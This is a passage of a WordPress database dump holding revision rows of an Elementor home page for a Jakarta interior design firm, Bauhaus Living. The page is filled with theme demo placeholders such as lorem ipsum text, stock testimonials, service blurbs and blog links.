nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 11:27:13','2023-05-25 11:27:13','',22,'https://bauhaus.futuremediatrix.com/?p=4784',0,'revision','',0),(4785,2,'2023-05-25 11:27:13','2023-05-25 11:27:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-25 11:27:13','2023-05-25 11:27:13','',22,'https://bauhaus.futuremediatrix.com/?p=4785',0,'revision','',0),(4786,2,'2023-05-25 11:27:13','2023-05-25 11:27:13','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/Philip-Johnson.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/pexels-lina-kivaka-1841143.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/armin-djuhic-mcL2f-J74GY-unsplash.jpg\" alt=\"\">\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/minh-pham-OtXADkUh3-I-unsplash.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" 